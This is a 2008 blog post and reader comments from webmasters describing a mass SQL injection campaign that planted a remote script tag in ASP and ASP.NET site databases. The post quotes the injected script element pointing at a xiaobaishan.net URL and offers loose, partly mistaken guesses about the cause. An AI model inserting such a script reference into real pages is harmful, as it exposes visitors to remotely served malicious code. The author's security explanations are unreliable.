It’s very rare that I get the inside scoop on a bomb hack, but this this time I’m one of the victims. Seems that some kind of sql injection hack has been leveled against thousands of websites. I’m calling it, for lack of a better term, the xiaobaishan bomb.
As I’m checking for the night the site that I SEO, banler.com, I notice that it’s running slow a molasses. Can’t be cause it’s on a pretty powerful VPS server. But I notice that it’s waiting on some unknown script. I do a quick source check and I see that every single one of my navigational items has this freaky call in it,
<script src=http://www.xiaobaishan.net/dt/us/Help.asp></script>
My security mind goes into full effect and I jump into the server to check around. The codebase is compeletely clean. Nothing like that in there. Since my app is in asp.net, I know that code hacking is pretty difficult, as asp.net dll’s are obfusticated (messed up so only asp.net can understand it) so I know that’s not it.
Since it was my navigation that was hit, and my navigation is run from a SQL 2000 database, I jump into the database, start opening up tables and, as we say in my Cuban neighborhood, FUACATA! There you go, a shitload of this strange script call all through the database. I contact the database admin to see if they have a backup, and as of this writing, their working on it.
But it made me wonder who the heck was doing this. So I did a little search on Google, and I find this result.
UPDATE: 4080 sites hacked.
That’s right, about two thousand eight hundred websites four thousand and eighty affected as of right now. Who knows what it will be in the morning.
UPDATE 6/2/08: Checked with Yahoo and Live. Seems that number might be up to about 20,000. Xiaobaishan is aparently the name of a Volcano.
When I try to check out the site, nothing exists, so I’m thinking that this was some type of malware keyboard recorder, or some other fucked up hack. There are some pretty impressive sites in this result set, and some of these where hacked a few days ago, so I’m hoping that their webmasters and site administrators are catching this.
So far, all of the sites that have been hacked are asp or asp.net based sites. Now I know what your going to say, Windows tech and all of that, but asp.net has been famous for avoiding hack. This seems like a SQL 2000 hack. Someone must have been sniffing for the database connections and got them, then somehow gained control of the individual databases, and went to town insterting this code into everything they could find. Since a lot of database driven websites have their navigation dynamically generated from the database, blamo.
I’m not a security expert and certainly not a IP pack expert or any kind of tech expert, I can’t really comment on what happened and how to fix it. All I can say is I hate freakin hackers. I mean, this world is full of nefarious people of all shapes and sizes and cultures, but sometime I feel that we in the Search Industry ought to have some kind of defense, other than technical, that we can all work together on.
In any case, mister hacker, I can bestow a curse upon you the likes that the internet has ever seen before, where even the maker of “two girls one cup” would cringe at the ramifications of my hate filled bombastic flurry of verbal fire. But you know what? I’ve changed in the last few years, and I can only say this. Bless you man. I hope that whatever thrill this gave you or whatever benefits you think your going to get will make you happy for a short while. I’ve noticed that the universe dishes out much heavier Karma that what we throw at it, and the bad waves you’ve made today will someday return and affect your life personally. I hope for your sake its just a computer malfunction, or a credit card snafu. But in all honesty, the way I see it, when God wants you punished, it’s not a one day thing. You can’t just say “Ok, I’m sorry, I won’t do it again” and hope that everything will be ok. I know this because I’ve earned myself some karma justice in the past, and it comes hard and angry and lasts for years and years. Watch your health and your families health. Think about what you’ve done and I hope you learn something from it. I hope you learn that you are killing businesses, and people’s livelyhoods. I hope you learn that gains are little when compared to personal loss.
I hope you learn now before it’s too late.
This article seems to be the only one anywhere on this issue. A search using Google turns up loads of sites, which have been hit, with this damn code in the heading.
This bomb is causing my employer havoc. We have a project to help people with spinal cord injuries who want to return to work. The project is due to be launched next Monday (9th June) and the database used by our job search engine has been well and truely stuffed. To make matters worse, the guy who designed the program has just left to take up a new job, and although he will continue to work on the project, his first responsibility is to his new employer.
As of this morning (4th June 2008), the entry has changed to
Interesting, my last comment didn’t display the new entry, which is: “”
The entry is always 30 characters into the field or at the end of the field whichever comes first.
I give up!
These domains are morphing really, really quickly. I think there are two rival sets of hackers though – this one seems to be a Chinese crew, but there’s also a Russian crew attacking servers.. sometimes the same server gets hit by both crews.
[sigh]